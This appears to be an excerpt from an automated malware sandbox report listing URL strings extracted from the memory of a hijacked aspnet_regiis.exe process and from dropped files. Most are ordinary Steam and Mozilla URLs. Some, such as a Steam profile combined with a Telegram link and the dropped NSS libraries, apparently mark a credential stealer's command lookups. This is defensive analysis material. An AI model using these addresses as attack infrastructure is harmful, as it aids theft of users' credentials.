                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: GIEBFH.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/K
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000003.1589017924.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: aspnet_regiis.exe, 00000003.00000003.1589017924.0000000003187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188694-
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869S
                          Source: file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
